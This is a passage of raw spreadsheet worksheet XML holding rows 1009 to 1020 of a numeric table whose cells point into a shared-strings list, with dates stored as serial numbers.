      <c r="BC1009" t="s">
        <v>11152</v>
      </c>
      <c r="BD1009" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1010" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1010">
        <v>4880</v>
      </c>
      <c r="B1010" t="s">
        <v>7698</v>
      </c>
      <c r="C1010" t="s">
        <v>99</v>
      </c>
      <c r="D1010" t="s">
        <v>7699</v>
      </c>
      <c r="E1010" t="s">
        <v>363</v>
      </c>
      <c r="F1010" t="s">
        <v>364</v>
      </c>
      <c r="G1010" s="1">
        <v>44168</v>
      </c>
      <c r="H1010">
        <v>6343</v>
      </c>
      <c r="I1010">
        <v>6343</v>
      </c>
      <c r="J1010">
        <v>0</v>
      </c>
      <c r="K1010">
        <v>0</v>
      </c>
      <c r="L1010">
        <v>0</v>
      </c>
      <c r="M1010">
        <v>0</v>
      </c>
      <c r="N1010">
        <v>0</v>
      </c>
      <c r="O1010">
        <v>0</v>
      </c>
      <c r="P1010">
        <v>0</v>
      </c>
      <c r="Q1010">
        <v>0</v>
      </c>
      <c r="R1010">
        <v>0</v>
      </c>
      <c r="S1010">
        <v>0</v>
      </c>
      <c r="T1010">
        <v>1</v>
      </c>
      <c r="U1010">
        <v>0</v>
      </c>
      <c r="V1010">
        <v>0</v>
      </c>
      <c r="W1010">
        <v>0</v>
      </c>
      <c r="X1010">
        <v>0</v>
      </c>
      <c r="Y1010">
        <v>0</v>
      </c>
      <c r="Z1010">
        <v>0</v>
      </c>
      <c r="AA1010">
        <v>0</v>
      </c>
      <c r="AB1010">
        <v>0</v>
      </c>
      <c r="AC1010">
        <v>0</v>
      </c>
      <c r="AD1010">
        <v>0</v>
      </c>
      <c r="AE1010">
        <v>20000</v>
      </c>
      <c r="AF1010" t="s">
        <v>7700</v>
      </c>
      <c r="AG1010">
        <v>13910</v>
      </c>
      <c r="AH1010">
        <v>12</v>
      </c>
      <c r="AJ1010">
        <v>157</v>
      </c>
      <c r="AK1010" t="s">
        <v>3899</v>
      </c>
      <c r="AL1010" t="s">
        <v>3900</v>
      </c>
      <c r="AM1010" t="s">
        <v>7701</v>
      </c>
      <c r="AN1010" t="s">
        <v>68</v>
      </c>
      <c r="AO1010">
        <v>2020</v>
      </c>
      <c r="AP1010">
        <v>81384099076</v>
      </c>
      <c r="AQ1010" t="s">
        <v>7702</v>
      </c>
      <c r="AR1010" t="s">
        <v>7700</v>
      </c>
      <c r="AS1010" t="s">
        <v>371</v>
      </c>
      <c r="AT1010" t="s">
        <v>58</v>
      </c>
      <c r="AU1010">
        <v>6</v>
      </c>
      <c r="AV1010">
        <v>1</v>
      </c>
      <c r="AW1010">
        <v>0</v>
      </c>
      <c r="AX1010">
        <v>0</v>
      </c>
      <c r="AY1010">
        <v>1</v>
      </c>
      <c r="AZ1010">
        <v>1</v>
      </c>
      <c r="BA1010" t="s">
        <v>17460</v>
      </c>
      <c r="BB1010" t="s">
        <v>16063</v>
      </c>
      <c r="BC1010">
        <v>0</v>
      </c>
      <c r="BD1010" t="s">
        <v>12061</v>
      </c>
    </row>
    <row r="1011" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1011">
        <v>4995</v>
      </c>
      <c r="B1011" t="s">
        <v>7703</v>
      </c>
      <c r="C1011" t="s">
        <v>74</v>
      </c>
      <c r="D1011" t="s">
        <v>7704</v>
      </c>
      <c r="E1011" t="s">
        <v>76</v>
      </c>
      <c r="F1011" t="s">
        <v>7705</v>
      </c>
      <c r="G1011" s="1">
        <v>44152</v>
      </c>
      <c r="H1011">
        <v>6395</v>
      </c>
      <c r="I1011">
        <v>6395</v>
      </c>
      <c r="J1011">
        <v>6</v>
      </c>
      <c r="K1011">
        <v>8</v>
      </c>
      <c r="L1011">
        <v>1</v>
      </c>
      <c r="M1011">
        <v>5</v>
      </c>
      <c r="N1011">
        <v>0</v>
      </c>
      <c r="O1011">
        <v>0</v>
      </c>
      <c r="P1011">
        <v>4</v>
      </c>
      <c r="Q1011">
        <v>0</v>
      </c>
      <c r="R1011">
        <v>0</v>
      </c>
      <c r="S1011">
        <v>0</v>
      </c>
      <c r="T1011">
        <v>3</v>
      </c>
      <c r="U1011">
        <v>335</v>
      </c>
      <c r="V1011">
        <v>200</v>
      </c>
      <c r="W1011">
        <v>1500</v>
      </c>
      <c r="X1011">
        <v>7500</v>
      </c>
      <c r="Y1011">
        <v>0</v>
      </c>
      <c r="Z1011">
        <v>0</v>
      </c>
      <c r="AA1011">
        <v>4000</v>
      </c>
      <c r="AB1011">
        <v>0</v>
      </c>
      <c r="AC1011">
        <v>0</v>
      </c>
      <c r="AD1011">
        <v>0</v>
      </c>
      <c r="AE1011">
        <v>15000</v>
      </c>
      <c r="AF1011" t="s">
        <v>7706</v>
      </c>
      <c r="AG1011">
        <v>59273</v>
      </c>
      <c r="AH1011">
        <v>14</v>
      </c>
      <c r="AJ1011">
        <v>204</v>
      </c>
      <c r="AK1011" t="s">
        <v>124</v>
      </c>
      <c r="AL1011" t="s">
        <v>7707</v>
      </c>
      <c r="AM1011" t="s">
        <v>7708</v>
      </c>
      <c r="AN1011" t="s">
        <v>82</v>
      </c>
      <c r="AO1011">
        <v>2002</v>
      </c>
      <c r="AP1011" t="s">
        <v>7709</v>
      </c>
      <c r="AQ1011" t="s">
        <v>7710</v>
      </c>
      <c r="AR1011" t="s">
        <v>7706</v>
      </c>
      <c r="AS1011" t="s">
        <v>71</v>
      </c>
      <c r="AT1011" t="s">
        <v>86</v>
      </c>
      <c r="AU1011">
        <v>26</v>
      </c>
      <c r="AV1011">
        <v>1</v>
      </c>
      <c r="AW1011">
        <v>50</v>
      </c>
      <c r="AX1011">
        <v>253</v>
      </c>
      <c r="AY1011">
        <v>46</v>
      </c>
      <c r="AZ1011">
        <v>49</v>
      </c>
      <c r="BA1011" t="s">
        <v>17507</v>
      </c>
      <c r="BB1011" t="s">
        <v>16068</v>
      </c>
      <c r="BC1011" t="s">
        <v>9550</v>
      </c>
      <c r="BD1011" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1012" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1012">
        <v>4860</v>
      </c>
      <c r="B1012" t="s">
        <v>7711</v>
      </c>
      <c r="C1012" t="s">
        <v>579</v>
      </c>
      <c r="D1012" t="s">
        <v>7712</v>
      </c>
      <c r="E1012" t="s">
        <v>142</v>
      </c>
      <c r="F1012" t="s">
        <v>7713</v>
      </c>
      <c r="G1012" s="1">
        <v>44098</v>
      </c>
      <c r="H1012">
        <v>6402</v>
      </c>
      <c r="I1012">
        <v>6402</v>
      </c>
      <c r="J1012">
        <v>1</v>
      </c>
      <c r="K1012">
        <v>0</v>
      </c>
      <c r="L1012">
        <v>1</v>
      </c>
      <c r="M1012">
        <v>0</v>
      </c>
      <c r="N1012">
        <v>0</v>
      </c>
      <c r="O1012">
        <v>0</v>
      </c>
      <c r="P1012">
        <v>0</v>
      </c>
      <c r="Q1012">
        <v>8</v>
      </c>
      <c r="R1012">
        <v>0</v>
      </c>
      <c r="S1012">
        <v>0</v>
      </c>
      <c r="T1012">
        <v>0</v>
      </c>
      <c r="U1012">
        <v>40000</v>
      </c>
      <c r="V1012">
        <v>0</v>
      </c>
      <c r="W1012">
        <v>3000</v>
      </c>
      <c r="X1012">
        <v>0</v>
      </c>
      <c r="Y1012">
        <v>0</v>
      </c>
      <c r="Z1012">
        <v>0</v>
      </c>
      <c r="AA1012">
        <v>0</v>
      </c>
      <c r="AB1012">
        <v>80</v>
      </c>
      <c r="AC1012">
        <v>0</v>
      </c>
      <c r="AD1012">
        <v>0</v>
      </c>
      <c r="AE1012">
        <v>0</v>
      </c>
      <c r="AF1012" t="s">
        <v>7714</v>
      </c>
      <c r="AG1012">
        <v>75271</v>
      </c>
      <c r="AH1012">
        <v>23</v>
      </c>
      <c r="AJ1012">
        <v>358</v>
      </c>
      <c r="AK1012" t="s">
        <v>7715</v>
      </c>
      <c r="AL1012" t="s">
        <v>7716</v>
      </c>
      <c r="AM1012" t="s">
        <v>7717</v>
      </c>
      <c r="AN1012" t="s">
        <v>55</v>
      </c>
      <c r="AO1012">
        <v>2014</v>
      </c>
      <c r="AP1012">
        <v>81346325272</v>
      </c>
      <c r="AQ1012" t="s">
        <v>7718</v>
      </c>
      <c r="AR1012" t="s">
        <v>7714</v>
      </c>
      <c r="AS1012" t="s">
        <v>71</v>
      </c>
      <c r="AT1012" t="s">
        <v>58</v>
      </c>
      <c r="AU1012">
        <v>30</v>
      </c>
      <c r="AV1012">
        <v>0</v>
      </c>
      <c r="AW1012">
        <v>0</v>
      </c>
      <c r="AX1012">
        <v>0</v>
      </c>
      <c r="AY1012">
        <v>4</v>
      </c>
      <c r="AZ1012">
        <v>1</v>
      </c>
      <c r="BA1012" t="s">
        <v>17451</v>
      </c>
      <c r="BB1012" t="s">
        <v>17457</v>
      </c>
      <c r="BC1012">
        <v>0</v>
      </c>
      <c r="BD1012" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1013" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1013">
        <v>4806</v>
      </c>
      <c r="B1013" t="s">
        <v>7719</v>
      </c>
      <c r="C1013" t="s">
        <v>74</v>
      </c>
      <c r="D1013" t="s">
        <v>7720</v>
      </c>
      <c r="E1013" t="s">
        <v>142</v>
      </c>
      <c r="F1013" t="s">
        <v>3299</v>
      </c>
      <c r="G1013" s="1">
        <v>44259</v>
      </c>
      <c r="H1013">
        <v>6431</v>
      </c>
      <c r="I1013">
        <v>6431</v>
      </c>
      <c r="J1013">
        <v>2</v>
      </c>
      <c r="K1013">
        <v>0</v>
      </c>
      <c r="L1013">
        <v>3</v>
      </c>
      <c r="M1013">
        <v>0</v>
      </c>
      <c r="N1013">
        <v>0</v>
      </c>
      <c r="O1013">
        <v>0</v>
      </c>
      <c r="P1013">
        <v>0</v>
      </c>
      <c r="Q1013">
        <v>0</v>
      </c>
      <c r="R1013">
        <v>1</v>
      </c>
      <c r="S1013">
        <v>1</v>
      </c>
      <c r="T1013">
        <v>1</v>
      </c>
      <c r="U1013">
        <v>300000</v>
      </c>
      <c r="V1013">
        <v>0</v>
      </c>
      <c r="W1013">
        <v>8000</v>
      </c>
      <c r="X1013">
        <v>0</v>
      </c>
      <c r="Y1013">
        <v>0</v>
      </c>
      <c r="Z1013">
        <v>0</v>
      </c>
      <c r="AA1013">
        <v>0</v>
      </c>
      <c r="AB1013">
        <v>0</v>
      </c>
      <c r="AC1013">
        <v>1000</v>
      </c>
      <c r="AD1013">
        <v>1</v>
      </c>
      <c r="AE1013">
        <v>3000</v>
      </c>
      <c r="AF1013" t="s">
        <v>7721</v>
      </c>
      <c r="AG1013">
        <v>52111</v>
      </c>
      <c r="AH1013">
        <v>14</v>
      </c>
      <c r="AJ1013">
        <v>222</v>
      </c>
      <c r="AK1013" t="s">
        <v>2722</v>
      </c>
      <c r="AL1013" t="s">
        <v>2723</v>
      </c>
      <c r="AM1013" t="s">
        <v>7722</v>
      </c>
      <c r="AN1013" t="s">
        <v>55</v>
      </c>
      <c r="AO1013">
        <v>2019</v>
      </c>
      <c r="AP1013">
        <v>81286510282</v>
      </c>
      <c r="AQ1013" t="s">
        <v>7723</v>
      </c>
      <c r="AR1013" t="s">
        <v>7721</v>
      </c>
      <c r="AS1013" t="s">
        <v>187</v>
      </c>
      <c r="AT1013" t="s">
        <v>58</v>
      </c>
      <c r="AU1013">
        <v>26</v>
      </c>
      <c r="AV1013">
        <v>2</v>
      </c>
      <c r="AW1013">
        <v>102</v>
      </c>
      <c r="AX1013">
        <v>63</v>
      </c>
      <c r="AY1013">
        <v>12</v>
      </c>
      <c r="AZ1013">
        <v>9</v>
      </c>
      <c r="BA1013" t="s">
        <v>17418</v>
      </c>
      <c r="BB1013" t="s">
        <v>16056</v>
      </c>
      <c r="BC1013" t="s">
        <v>12087</v>
      </c>
      <c r="BD1013" t="s">
        <v>12088</v>
      </c>
    </row>
    <row r="1014" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1014">
        <v>4948</v>
      </c>
      <c r="B1014" t="s">
        <v>7724</v>
      </c>
      <c r="C1014" t="s">
        <v>168</v>
      </c>
      <c r="D1014" t="s">
        <v>7725</v>
      </c>
      <c r="E1014" t="s">
        <v>5553</v>
      </c>
      <c r="F1014" t="s">
        <v>7726</v>
      </c>
      <c r="G1014" s="1">
        <v>44207</v>
      </c>
      <c r="H1014">
        <v>6440</v>
      </c>
      <c r="I1014">
        <v>6440</v>
      </c>
      <c r="J1014">
        <v>6</v>
      </c>
      <c r="K1014">
        <v>0</v>
      </c>
      <c r="L1014">
        <v>0</v>
      </c>
      <c r="M1014">
        <v>0</v>
      </c>
      <c r="N1014">
        <v>0</v>
      </c>
      <c r="O1014">
        <v>0</v>
      </c>
      <c r="P1014">
        <v>0</v>
      </c>
      <c r="Q1014">
        <v>0</v>
      </c>
      <c r="R1014">
        <v>0</v>
      </c>
      <c r="S1014">
        <v>1</v>
      </c>
      <c r="T1014">
        <v>0</v>
      </c>
      <c r="U1014">
        <v>600</v>
      </c>
      <c r="V1014">
        <v>0</v>
      </c>
      <c r="W1014">
        <v>0</v>
      </c>
      <c r="X1014">
        <v>0</v>
      </c>
      <c r="Y1014">
        <v>0</v>
      </c>
      <c r="Z1014">
        <v>0</v>
      </c>
      <c r="AA1014">
        <v>0</v>
      </c>
      <c r="AB1014">
        <v>0</v>
      </c>
      <c r="AC1014">
        <v>0</v>
      </c>
      <c r="AD1014">
        <v>1</v>
      </c>
      <c r="AE1014">
        <v>0</v>
      </c>
      <c r="AF1014" t="s">
        <v>7727</v>
      </c>
      <c r="AG1014">
        <v>17510</v>
      </c>
      <c r="AH1014">
        <v>13</v>
      </c>
      <c r="AJ1014">
        <v>176</v>
      </c>
      <c r="AK1014" t="s">
        <v>173</v>
      </c>
      <c r="AL1014" t="s">
        <v>3722</v>
      </c>
      <c r="AM1014" t="s">
        <v>7728</v>
      </c>
      <c r="AN1014" t="s">
        <v>68</v>
      </c>
      <c r="AO1014">
        <v>2013</v>
      </c>
      <c r="AP1014" t="s">
        <v>7729</v>
      </c>
      <c r="AQ1014" t="s">
        <v>7730</v>
      </c>
      <c r="AR1014" t="s">
        <v>7727</v>
      </c>
      <c r="AS1014" t="s">
        <v>71</v>
      </c>
      <c r="AT1014" t="s">
        <v>72</v>
      </c>
      <c r="AU1014">
        <v>28</v>
      </c>
      <c r="AV1014">
        <v>1</v>
      </c>
      <c r="AW1014">
        <v>0</v>
      </c>
      <c r="AX1014">
        <v>3</v>
      </c>
      <c r="AY1014">
        <v>1</v>
      </c>
      <c r="AZ1014">
        <v>5</v>
      </c>
      <c r="BA1014" t="s">
        <v>17506</v>
      </c>
      <c r="BB1014">
        <v>0</v>
      </c>
      <c r="BC1014" t="s">
        <v>12102</v>
      </c>
      <c r="BD1014" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1015" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1015">
        <v>4978</v>
      </c>
      <c r="B1015" t="s">
        <v>7731</v>
      </c>
      <c r="C1015" t="s">
        <v>318</v>
      </c>
      <c r="D1015" t="s">
        <v>7732</v>
      </c>
      <c r="E1015" t="s">
        <v>363</v>
      </c>
      <c r="F1015" t="s">
        <v>364</v>
      </c>
      <c r="G1015" s="1">
        <v>44327</v>
      </c>
      <c r="H1015">
        <v>6448</v>
      </c>
      <c r="I1015">
        <v>6448</v>
      </c>
      <c r="J1015">
        <v>0</v>
      </c>
      <c r="K1015">
        <v>0</v>
      </c>
      <c r="L1015">
        <v>0</v>
      </c>
      <c r="M1015">
        <v>0</v>
      </c>
      <c r="N1015">
        <v>0</v>
      </c>
      <c r="O1015">
        <v>0</v>
      </c>
      <c r="P1015">
        <v>0</v>
      </c>
      <c r="Q1015">
        <v>0</v>
      </c>
      <c r="R1015">
        <v>0</v>
      </c>
      <c r="S1015">
        <v>0</v>
      </c>
      <c r="T1015">
        <v>2</v>
      </c>
      <c r="U1015">
        <v>0</v>
      </c>
      <c r="V1015">
        <v>0</v>
      </c>
      <c r="W1015">
        <v>0</v>
      </c>
      <c r="X1015">
        <v>0</v>
      </c>
      <c r="Y1015">
        <v>0</v>
      </c>
      <c r="Z1015">
        <v>0</v>
      </c>
      <c r="AA1015">
        <v>0</v>
      </c>
      <c r="AB1015">
        <v>0</v>
      </c>
      <c r="AC1015">
        <v>0</v>
      </c>
      <c r="AD1015">
        <v>0</v>
      </c>
      <c r="AE1015">
        <v>5000</v>
      </c>
      <c r="AF1015" t="s">
        <v>7733</v>
      </c>
      <c r="AG1015">
        <v>90245</v>
      </c>
      <c r="AH1015">
        <v>26</v>
      </c>
      <c r="AJ1015">
        <v>420</v>
      </c>
      <c r="AK1015" t="s">
        <v>936</v>
      </c>
      <c r="AL1015" t="s">
        <v>2680</v>
      </c>
      <c r="AM1015" t="s">
        <v>7734</v>
      </c>
      <c r="AN1015" t="s">
        <v>68</v>
      </c>
      <c r="AO1015">
        <v>2018</v>
      </c>
      <c r="AP1015">
        <v>81341566102</v>
      </c>
      <c r="AQ1015" t="s">
        <v>7735</v>
      </c>
      <c r="AR1015" t="s">
        <v>7733</v>
      </c>
      <c r="AS1015" t="s">
        <v>371</v>
      </c>
      <c r="AT1015" t="s">
        <v>58</v>
      </c>
      <c r="AU1015">
        <v>26</v>
      </c>
      <c r="AV1015">
        <v>0</v>
      </c>
      <c r="AW1015">
        <v>3</v>
      </c>
      <c r="AX1015">
        <v>20</v>
      </c>
      <c r="AY1015">
        <v>1</v>
      </c>
      <c r="AZ1015">
        <v>1</v>
      </c>
      <c r="BA1015" t="s">
        <v>16887</v>
      </c>
      <c r="BB1015" t="s">
        <v>16066</v>
      </c>
      <c r="BC1015">
        <v>0</v>
      </c>
      <c r="BD1015" t="s">
        <v>12189</v>
      </c>
    </row>
    <row r="1016" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1016">
        <v>4998</v>
      </c>
      <c r="B1016" t="s">
        <v>7736</v>
      </c>
      <c r="C1016" t="s">
        <v>790</v>
      </c>
      <c r="D1016" t="s">
        <v>7737</v>
      </c>
      <c r="E1016" t="s">
        <v>142</v>
      </c>
      <c r="F1016" t="s">
        <v>7738</v>
      </c>
      <c r="G1016" s="1">
        <v>44131</v>
      </c>
      <c r="H1016">
        <v>6456</v>
      </c>
      <c r="I1016">
        <v>6456</v>
      </c>
      <c r="J1016">
        <v>2</v>
      </c>
      <c r="K1016">
        <v>0</v>
      </c>
      <c r="L1016">
        <v>4</v>
      </c>
      <c r="M1016">
        <v>0</v>
      </c>
      <c r="N1016">
        <v>0</v>
      </c>
      <c r="O1016">
        <v>0</v>
      </c>
      <c r="P1016">
        <v>0</v>
      </c>
      <c r="Q1016">
        <v>0</v>
      </c>
      <c r="R1016">
        <v>3</v>
      </c>
      <c r="S1016">
        <v>0</v>
      </c>
      <c r="T1016">
        <v>1</v>
      </c>
      <c r="U1016">
        <v>100</v>
      </c>
      <c r="V1016">
        <v>0</v>
      </c>
      <c r="W1016">
        <v>12</v>
      </c>
      <c r="X1016">
        <v>0</v>
      </c>
      <c r="Y1016">
        <v>0</v>
      </c>
      <c r="Z1016">
        <v>0</v>
      </c>
      <c r="AA1016">
        <v>0</v>
      </c>
      <c r="AB1016">
        <v>0</v>
      </c>
      <c r="AC1016">
        <v>9</v>
      </c>
      <c r="AD1016">
        <v>0</v>
      </c>
      <c r="AE1016">
        <v>50</v>
      </c>
      <c r="AF1016" t="s">
        <v>7739</v>
      </c>
      <c r="AG1016">
        <v>93233</v>
      </c>
      <c r="AH1016">
        <v>27</v>
      </c>
      <c r="AJ1016">
        <v>438</v>
      </c>
      <c r="AK1016" t="s">
        <v>793</v>
      </c>
      <c r="AL1016" t="s">
        <v>794</v>
      </c>
      <c r="AM1016" t="s">
        <v>7740</v>
      </c>
      <c r="AN1016" t="s">
        <v>55</v>
      </c>
      <c r="AO1016">
        <v>2018</v>
      </c>
      <c r="AP1016" t="s">
        <v>7741</v>
      </c>
      <c r="AQ1016" t="s">
        <v>7742</v>
      </c>
      <c r="AR1016" t="s">
        <v>7743</v>
      </c>
      <c r="AS1016" t="s">
        <v>71</v>
      </c>
      <c r="AT1016" t="s">
        <v>58</v>
      </c>
      <c r="AU1016">
        <v>6</v>
      </c>
      <c r="AV1016">
        <v>0</v>
      </c>
      <c r="AW1016">
        <v>4</v>
      </c>
      <c r="AX1016">
        <v>12</v>
      </c>
      <c r="AY1016">
        <v>6</v>
      </c>
      <c r="AZ1016">
        <v>6</v>
      </c>
      <c r="BA1016" t="s">
        <v>17527</v>
      </c>
      <c r="BB1016" t="s">
        <v>16069</v>
      </c>
      <c r="BC1016" t="s">
        <v>10010</v>
      </c>
      <c r="BD1016" t="s">
        <v>12114</v>
      </c>
    </row>
    <row r="1017" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1017">
        <v>4915</v>
      </c>
      <c r="B1017" t="s">
        <v>7744</v>
      </c>
      <c r="C1017" t="s">
        <v>157</v>
      </c>
      <c r="D1017" t="s">
        <v>7745</v>
      </c>
      <c r="E1017" t="s">
        <v>142</v>
      </c>
      <c r="F1017" t="s">
        <v>7746</v>
      </c>
      <c r="G1017" s="1">
        <v>44137</v>
      </c>
      <c r="H1017">
        <v>6516</v>
      </c>
      <c r="I1017">
        <v>6516</v>
      </c>
      <c r="J1017">
        <v>2</v>
      </c>
      <c r="K1017">
        <v>0</v>
      </c>
      <c r="L1017">
        <v>1</v>
      </c>
      <c r="M1017">
        <v>0</v>
      </c>
      <c r="N1017">
        <v>0</v>
      </c>
      <c r="O1017">
        <v>0</v>
      </c>
      <c r="P1017">
        <v>0</v>
      </c>
      <c r="Q1017">
        <v>0</v>
      </c>
      <c r="R1017">
        <v>0</v>
      </c>
      <c r="S1017">
        <v>0</v>
      </c>
      <c r="T1017">
        <v>0</v>
      </c>
      <c r="U1017">
        <v>10000</v>
      </c>
      <c r="V1017">
        <v>0</v>
      </c>
      <c r="W1017">
        <v>200</v>
      </c>
      <c r="X1017">
        <v>0</v>
      </c>
      <c r="Y1017">
        <v>0</v>
      </c>
      <c r="Z1017">
        <v>0</v>
      </c>
      <c r="AA1017">
        <v>0</v>
      </c>
      <c r="AB1017">
        <v>0</v>
      </c>
      <c r="AC1017">
        <v>0</v>
      </c>
      <c r="AD1017">
        <v>0</v>
      </c>
      <c r="AE1017">
        <v>0</v>
      </c>
      <c r="AF1017" t="s">
        <v>7747</v>
      </c>
      <c r="AG1017">
        <v>68462</v>
      </c>
      <c r="AH1017">
        <v>16</v>
      </c>
      <c r="AJ1017">
        <v>237</v>
      </c>
      <c r="AK1017" t="s">
        <v>7748</v>
      </c>
      <c r="AL1017" t="s">
        <v>7749</v>
      </c>
      <c r="AM1017" t="s">
        <v>7750</v>
      </c>
      <c r="AN1017" t="s">
        <v>68</v>
      </c>
      <c r="AO1017">
        <v>2015</v>
      </c>
      <c r="AP1017" t="s">
        <v>7751</v>
      </c>
      <c r="AQ1017" t="s">
        <v>7752</v>
      </c>
      <c r="AR1017" t="s">
        <v>7753</v>
      </c>
      <c r="AS1017" t="s">
        <v>71</v>
      </c>
      <c r="AT1017" t="s">
        <v>72</v>
      </c>
      <c r="AU1017">
        <v>21</v>
      </c>
      <c r="AV1017">
        <v>1</v>
      </c>
      <c r="AW1017">
        <v>0</v>
      </c>
      <c r="AX1017">
        <v>4</v>
      </c>
      <c r="AY1017">
        <v>4</v>
      </c>
      <c r="AZ1017">
        <v>0</v>
      </c>
      <c r="BA1017" t="s">
        <v>17488</v>
      </c>
      <c r="BB1017" t="s">
        <v>16055</v>
      </c>
      <c r="BC1017" t="s">
        <v>12181</v>
      </c>
      <c r="BD1017" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1018" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1018">
        <v>4882</v>
      </c>
      <c r="B1018" t="s">
        <v>7754</v>
      </c>
      <c r="C1018" t="s">
        <v>458</v>
      </c>
      <c r="D1018" t="s">
        <v>7755</v>
      </c>
      <c r="E1018" t="s">
        <v>843</v>
      </c>
      <c r="F1018" t="s">
        <v>7268</v>
      </c>
      <c r="G1018" s="1">
        <v>44224</v>
      </c>
      <c r="H1018">
        <v>6537</v>
      </c>
      <c r="I1018">
        <v>6537</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t="s">
        <v>7756</v>
      </c>
      <c r="AG1018">
        <v>29487</v>
      </c>
      <c r="AH1018">
        <v>5</v>
      </c>
      <c r="AJ1018">
        <v>153</v>
      </c>
      <c r="AK1018" t="s">
        <v>7757</v>
      </c>
      <c r="AL1018" t="s">
        <v>7758</v>
      </c>
      <c r="AM1018" t="s">
        <v>7759</v>
      </c>
      <c r="AN1018" t="s">
        <v>55</v>
      </c>
      <c r="AO1018">
        <v>1991</v>
      </c>
      <c r="AP1018" t="s">
        <v>623</v>
      </c>
      <c r="AQ1018" t="s">
        <v>7760</v>
      </c>
      <c r="AR1018" t="s">
        <v>7756</v>
      </c>
      <c r="AS1018" t="s">
        <v>71</v>
      </c>
      <c r="AT1018" t="s">
        <v>58</v>
      </c>
      <c r="AU1018">
        <v>24</v>
      </c>
      <c r="AV1018">
        <v>1</v>
      </c>
      <c r="AW1018">
        <v>0</v>
      </c>
      <c r="AX1018">
        <v>0</v>
      </c>
      <c r="AY1018">
        <v>5</v>
      </c>
      <c r="AZ1018">
        <v>0</v>
      </c>
      <c r="BA1018" t="s">
        <v>17463</v>
      </c>
      <c r="BB1018" t="s">
        <v>17464</v>
      </c>
      <c r="BC1018" t="s">
        <v>9638</v>
      </c>
      <c r="BD1018" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="1019" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1019">
        <v>5002</v>
      </c>
      <c r="B1019" t="s">
        <v>7761</v>
      </c>
      <c r="C1019" t="s">
        <v>579</v>
      </c>
      <c r="D1019" t="s">
        <v>7762</v>
      </c>
      <c r="E1019" t="s">
        <v>363</v>
      </c>
      <c r="F1019" t="s">
        <v>547</v>
      </c>
      <c r="G1019" s="1">
        <v>44110</v>
      </c>
      <c r="H1019">
        <v>6602</v>
      </c>
      <c r="I1019">
        <v>6602</v>
      </c>
      <c r="J1019">
        <v>0</v>
      </c>
      <c r="K1019">
        <v>0</v>
      </c>
      <c r="L1019">
        <v>0</v>
      </c>
      <c r="M1019">
        <v>0</v>
      </c>
      <c r="N1019">
        <v>0</v>
      </c>
      <c r="O1019">
        <v>0</v>
      </c>
      <c r="P1019">
        <v>0</v>
      </c>
      <c r="Q1019">
        <v>2</v>
      </c>
      <c r="R1019">
        <v>0</v>
      </c>
      <c r="S1019">
        <v>0</v>
      </c>
      <c r="T1019">
        <v>1</v>
      </c>
      <c r="U1019">
        <v>0</v>
      </c>
      <c r="V1019">
        <v>0</v>
      </c>
      <c r="W1019">
        <v>0</v>
      </c>
      <c r="X1019">
        <v>0</v>
      </c>
      <c r="Y1019">
        <v>0</v>
      </c>
      <c r="Z1019">
        <v>0</v>
      </c>
      <c r="AA1019">
        <v>0</v>
      </c>
      <c r="AB1019">
        <v>100</v>
      </c>
      <c r="AC1019">
        <v>0</v>
      </c>
      <c r="AD1019">
        <v>0</v>
      </c>
      <c r="AE1019">
        <v>500</v>
      </c>
      <c r="AF1019" t="s">
        <v>7763</v>
      </c>
      <c r="AG1019">
        <v>75683</v>
      </c>
      <c r="AH1019">
        <v>23</v>
      </c>
      <c r="AJ1019">
        <v>359</v>
      </c>
      <c r="AK1019" t="s">
        <v>7764</v>
      </c>
      <c r="AL1019" t="s">
        <v>7765</v>
      </c>
      <c r="AM1019" t="s">
        <v>7766</v>
      </c>
      <c r="AN1019" t="s">
        <v>68</v>
      </c>
      <c r="AO1019">
        <v>2020</v>
      </c>
      <c r="AP1019">
        <v>81222607085</v>
      </c>
      <c r="AQ1019" t="s">
        <v>7767</v>
      </c>
      <c r="AR1019" t="s">
        <v>7763</v>
      </c>
      <c r="AS1019" t="s">
        <v>553</v>
      </c>
      <c r="AT1019" t="s">
        <v>72</v>
      </c>
      <c r="AU1019">
        <v>25</v>
      </c>
      <c r="AV1019">
        <v>0</v>
      </c>
      <c r="AW1019">
        <v>0</v>
      </c>
      <c r="AX1019">
        <v>0</v>
      </c>
      <c r="AY1019">
        <v>4</v>
      </c>
      <c r="AZ1019">
        <v>4</v>
      </c>
      <c r="BA1019" t="s">
        <v>17531</v>
      </c>
      <c r="BB1019" t="s">
        <v>16070</v>
      </c>
      <c r="BC1019">
        <v>0</v>
      </c>
      <c r="BD1019" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1020" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1020">
        <v>5005</v>
      </c>
      <c r="B1020" t="s">
        <v>7768</v>
      </c>
      <c r="C1020" t="s">
        <v>99</v>
      </c>
      <c r="D1020" t="s">
        <v>7769</v>
      </c>
      <c r="E1020" t="s">
        <v>142</v>
      </c>
      <c r="F1020" t="s">
        <v>5278</v>
      </c>
      <c r="G1020" s="1">
        <v>44110</v>
      </c>
      <c r="H1020">
        <v>6619</v>
      </c>
      <c r="I1020">
        <v>6619</v>
      </c>
      <c r="J1020">
        <v>1</v>
      </c>
      <c r="K1020">
        <v>0</v>
      </c>
      <c r="L1020">
        <v>0</v>
      </c>
      <c r="M1020">
        <v>0</v>
      </c>
      <c r="N1020">
        <v>0</v>
      </c>
      <c r="O1020">
        <v>0</v>
      </c>
      <c r="P1020">
        <v>0</v>
      </c>
      <c r="Q1020">
        <v>0</v>
      </c>
      <c r="R1020">
        <v>0</v>
      </c>
      <c r="S1020">
        <v>0</v>
      </c>
      <c r="T1020">
        <v>0</v>
      </c>
      <c r="U1020">
        <v>200</v>
      </c>
      <c r="V1020">
        <v>0</v>
      </c>
      <c r="W1020">
